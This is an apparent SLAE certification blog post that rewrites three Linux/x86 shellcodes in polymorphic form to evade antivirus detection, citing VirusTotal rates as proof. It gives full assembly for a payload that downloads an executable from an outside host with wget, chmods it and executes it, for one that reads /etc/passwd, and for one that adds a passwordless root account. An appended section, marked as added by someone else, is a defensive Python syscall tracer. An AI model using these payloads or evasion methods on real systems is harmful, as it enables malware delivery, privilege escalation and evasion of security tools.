Polymorphic Shellcode

Posted on August 28, 2020, updated September 2, 2020, by badbit

Polymorphism, in the context of shellcoding, means altering the appearance of the code while keeping its core functionality intact. Polymorphic shellcode is written to beat signature-based detection, which is how antivirus products attempt to detect malicious files on a system.

In this blog post, we will take three Linux/x86 shellcodes from shell-storm and make a polymorphic version of each in an attempt to evade signature-based detection.

The three Shellcodes are:

  1. Download, chmod and execute an executable
  2. Read 4096 bytes from the /etc/passwd file
  3. Add root user with no password

Let’s begin with the first one.

1. Download, chmod and execute an executable

Original shellcode as taken from shell-storm.org:

To check the detection ratio, I quickly built an executable with a standard C harness. Below is the detection rate as seen on VirusTotal: as of now, 12/73 antivirus engines detect the payload. Now let's morph the shellcode, re-upload the file and check the detection rate again.

A bare semicolon at the end of a line marks every instruction I have morphed:

global _start
section .text
_start:
    ;fork (syscall 2); the three marked lines are junk, ebx is 0 after them either way
    xor ebx, ebx ;
    mov ebx, 0x1 ;
    xor ebx, ebx ;
    xor eax,eax
    mov al,0x2
    int 0x80
    xor ebx,ebx
    cmp eax,ebx      ; fork returns 0 in the child
    jz child

    ;wait(NULL) (waitpid, syscall 7); the marked sub/inc pair leaves al = 7
    xor eax,eax
    mov al,0x7
    sub al,0x1 ;
    inc eax    ;
    int 0x80

    ;chmod x (syscall 15): chmod("x", 0777); the marked edx lines are junk
    xor ecx,ecx
    xor eax, eax
    xor edx, edx ;
    inc edx      ;
    dec edx      ;
    push eax
    mov al, 0xf ;chmod
    push 0x78   ; x = filename
    mov ebx, esp ; pathname
    xor ecx, ecx
    mov cx, 0x1ff ; 511
    int 0x80

    ;exec x (execve, syscall 11): execve("x", {"x", NULL}, {NULL})
    xor eax, eax
    push eax
    push 0x78
    mov ebx, esp   ; pathname "x"
    push eax
    mov edx, esp   ; envp -> {NULL}
    push ebx
    mov ecx, esp   ; argv -> {"x", NULL}
    mov al, 20 ;
    sub al, 9  ; al = 11
;    mov al, 11
    int 0x80

child:
    ;download 192.168.2.222//x with wget: execve("/usr/bin/wget", {wget, url, NULL}, NULL)
    push 0xb
    pop eax
    cdq             ; edx = 0
    push edx        ; string terminator

    push 0x782f2f32 ;2//x avoid null byte
    push 0x32322e32 ;22.2
    push 0x2e383631 ;.861
    push 0x2e323931 ;.291
    mov ecx,esp     ; ecx -> "192.168.2.222//x"
    push edx

    push 0x74 ;t
    push 0x6567772f ;egw/
    push 0x6e69622f ;nib/
    push 0x7273752f ;rsu/
    mov ebx,esp     ; ebx -> "/usr/bin/wget"
    push edx        ; argv terminator
    push ecx
    push ebx
    mov ecx,esp     ; argv -> {"/usr/bin/wget", "192.168.2.222//x", NULL}
    int 0x80

As we can see below, after uploading the executable built from our morphed shellcode to VirusTotal, only 3 out of 72 antivirus engines could detect the payload at the time of writing. However, now that it has been submitted to VT, the payload will soon get a signature of its own.


2. Read /etc/passwd

Following is the debugged shellcode:

Morphed version:

global _start
_start:
	xor    ecx,ecx
	mul    ecx           ; eax = edx = 0
	mov    al,0x5        ; open (syscall 5); the marked dec/inc pair is junk
	dec    al ;
	inc    al ;
	push   ecx           ; string terminator
	push   0x64777373    ; "sswd"
	push   0x61702f63    ; "c/pa"
	push   0x74652f2f    ; "//et"
	mov    ebx,esp       ; ebx -> "//etc/passwd", ecx = 0 = O_RDONLY
	int    0x80
	xchg   ebx,eax       ; ebx = fd, eax = the string's address
	xchg   ecx,eax       ; ecx = buffer (reuses the string's stack space), eax = 0; the marked double xchg below is a no-op
	xchg   eax,ecx ;
	xchg   ecx,eax ;
	mov    al,0x3        ; read (syscall 3)
	xor    edx,edx
	mov    dx,0xfff      ; edx ends at 0x1000 = 4096 after the marked inc/dec pair and the final inc
	inc    edx ;
	dec    edx ;
	inc    edx
	int    0x80
	xchg   edx,eax       ; edx = bytes read
	xor    eax,eax
	mov    al,0x5 ;
	dec    al     ;
	mov    al,0x4        ; write (syscall 4); the two marked lines above are overwritten here
	mov    bl,0x1        ; stdout (the fd in ebx is small, so ebx becomes 1)
	int    0x80
	xchg   ebx,eax       ; eax = 1 -> exit
	int    0x80

3. Add root user with no password

Below is the original shellcode:

Here is the morphed version:


section .text

       global _start

_start:
       ; note: the marked mov reg, imm32 lines assemble with 32-bit immediates,
       ; e.g. mov eax, 0x5 is B8 05 00 00 00, so this version contains null bytes
       push byte 2 ;
       push byte 5
       pop eax             ; open (syscall 5)
       xor ecx, ecx
       push ecx            ; string terminator
       push 0x64777373     ; "sswd"
       push 0x61702f2f     ; "//pa"
       push 0x6374652f     ; "/etc" -> "/etc//passwd"
       mov eax, 0x5 ;
       mov ebx, esp        ; pathname
       mov cx, 02001Q      ; octal 02001 = O_WRONLY | O_APPEND
       int 0x80

       mov ebx, eax        ; fd

       push byte 4
       pop eax             ; write (syscall 4)
       xor edx, edx
       mov edx, 0x10 ;
       sub edx, 0x10 ;
       push edx            ; string terminator
       push 0x3a3a3a30     ; "0:::"
       push 0x3a303a3a     ; "::0:"
       push 0x74303072     ; "r00t" -> "r00t::0:0:::"
       mov ecx, esp        ; buffer
       push byte 12
       pop edx             ; length
       int 0x80

       xor eax, eax ;
       mov eax, 0x6        ; close (syscall 6)
       int 0x80

       push byte 1
       pop eax             ; exit (syscall 1)
       int 0x80

section .data
       random: db "loremipsum", 0x0   ; unused; only changes the binary's appearance
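All three morphed listings change their opcode bytes but not the sequence of system calls they make, and that sequence is what a sandbox or emulator, rather than a byte signature, keys on. The Python script below is an added example (it is not part of the post or of its GitHub repository): it walks a NASM listing top to bottom, does constant propagation over eax/ebx/ecx/edx and the pushed stack values, and reports the syscall number at every int 0x80. The embedded listing is the morphed "add root user" shellcode above, copied in as constructed input; the names syscall_trace, describe and State, and the register-tracking model itself, are my own assumptions. The tracker follows the listing linearly, so a branch such as the jz child in the first shellcode yields the parent's and the child's syscalls one after the other in listing order.

```python
"""Recover the int 0x80 syscall sequence of a NASM x86 listing by constant propagation
over eax/ebx/ecx/edx.  Added example for this post, not the author's code: junk
instructions change the opcode bytes a signature matches, not the syscall numbers."""
import re

SYSCALL_NAMES = {1: "exit", 2: "fork", 3: "read", 4: "write", 5: "open",  # i386 ABI
                 6: "close", 7: "waitpid", 11: "execve", 15: "chmod"}
PARTIAL = {"al": ("eax", 0xff), "bl": ("ebx", 0xff), "cl": ("ecx", 0xff), "dl": ("edx", 0xff),
           "ax": ("eax", 0xffff), "bx": ("ebx", 0xffff), "cx": ("ecx", 0xffff), "dx": ("edx", 0xffff)}

# Constructed input: the post's morphed "add root user" shellcode, junk instructions included.
ADD_ROOT_USER = """
    push byte 2         ; junk: extra value left on the stack
    push byte 5
    pop eax
    xor ecx, ecx
    push ecx
    push 0x64777373
    push 0x61702f2f
    push 0x6374652f
    mov eax, 0x5        ; junk: eax is already 5
    mov ebx, esp
    mov cx, 02001Q      ; O_WRONLY|O_APPEND, octal
    int 0x80
    mov ebx, eax
    push byte 4
    pop eax
    xor edx, edx
    mov edx, 0x10       ; junk pair: net effect edx = 0
    sub edx, 0x10
    push edx
    push 0x3a3a3a30
    push 0x3a303a3a
    push 0x74303072
    mov ecx, esp
    push byte 12
    pop edx
    int 0x80
    xor eax, eax        ; junk: overwritten by the next mov
    mov eax, 0x6
    int 0x80
    push byte 1
    pop eax
    int 0x80
"""

def imm(tok):  # NASM immediates: 0x78, 12, or octal with a Q suffix such as 02001Q
    return int(tok[:-1], 8) if tok.endswith("q") else int(tok, 16 if tok.startswith("0x") else 10)

class State:
    def __init__(self):
        self.regs = {r: None for r in ("eax", "ebx", "ecx", "edx")}  # None = not statically known
        self.stack, self.trace = [], []

    def get(self, name):  # esp and anything else not modelled reads as unknown
        full, mask = PARTIAL.get(name, (name, 0xffffffff))
        v = self.regs.get(full)
        return None if v is None else v & mask

    def set(self, name, value):  # a partial write keeps the upper bits, so they must be known
        full, mask = PARTIAL.get(name, (name, 0xffffffff))
        cur = 0 if mask == 0xffffffff else self.regs.get(full)
        self.regs[full] = None if None in (cur, value) else (cur & ~mask | value & mask) & 0xffffffff

    def value(self, tok):  # register or immediate operand
        return self.get(tok) if tok in self.regs or tok in PARTIAL or tok == "esp" else imm(tok)

    def step(self, mn, ops):
        if mn == "int":  # syscall: record eax; the kernel's return value is runtime data
            self.trace.append(self.regs["eax"])
            self.regs["eax"] = None
        elif mn == "mov":
            self.set(ops[0], self.value(ops[1]))
        elif mn == "xor":
            a, b = self.get(ops[0]), self.value(ops[1])
            self.set(ops[0], 0 if ops[0] == ops[1] else None if None in (a, b) else a ^ b)
        elif mn in ("inc", "dec", "add", "sub"):
            a, d = self.get(ops[0]), 1 if len(ops) == 1 else self.value(ops[1])
            self.set(ops[0], None if None in (a, d) else a + d * (1 if mn in ("inc", "add") else -1))
        elif mn == "push":
            self.stack.append(self.value(ops[0]))
        elif mn == "pop":
            self.set(ops[0], self.stack.pop() if self.stack else None)
        elif mn == "xchg":
            a, b = self.get(ops[0]), self.get(ops[1])
            self.set(ops[0], b)
            self.set(ops[1], a)
        elif mn == "cdq":  # edx = sign extension of eax
            a = self.regs["eax"]
            self.regs["edx"] = None if a is None else 0xffffffff * (a >> 31)
        elif mn == "mul":  # edx:eax = eax * operand; anything times a known zero is zero
            a, b = self.regs["eax"], self.value(ops[0])
            p = 0 if 0 in (a, b) else None if None in (a, b) else a * b
            self.regs["eax"], self.regs["edx"] = (None, None) if p is None else (p & 0xffffffff, p >> 32)
        # cmp, jz, labels and assembler directives leave the tracked state alone

def syscall_trace(listing):
    """Walk the listing top to bottom (branches are not followed) and return eax at each
    int 0x80, or None where the syscall number depends on runtime data."""
    st = State()
    for raw in listing.splitlines():
        parts = raw.split(";", 1)[0].strip().lower().split(None, 1)
        if not parts or parts[0].endswith(":"):  # blank line or label
            continue
        ops = [re.sub(r"^(byte|word|dword)\s+", "", o.strip()) for o in parts[1].split(",")] if len(parts) > 1 else []
        st.step(parts[0], ops)
    return st.trace

def describe(trace):
    return ["?" if n is None else f"{SYSCALL_NAMES.get(n, 'sys')}({n})" for n in trace]
```

For the embedded listing, describe(syscall_trace(ADD_ROOT_USER)) gives open(5), write(4), close(6), exit(1): exactly the sequence the unmorphed shellcode makes, with every junk line absorbed. Run on the /etc/passwd reader, the tracker reports the final syscall number as unknown, because that number is built from the file descriptor open returned (mov bl,0x1 followed by xchg ebx,eax), which only a concrete run or an emulator with a modelled kernel can resolve. That is the practical limit of this approach: as long as the morphing is pure junk insertion, static propagation recovers the invariant; once syscall numbers are derived from runtime values, a sandbox or emulator is needed.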

That’s all for this post.


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: PA-14690

Morphed shellcodes Github Repo

In the next post, which is also the last post of this series, we will write our own custom crypter for our payloads.
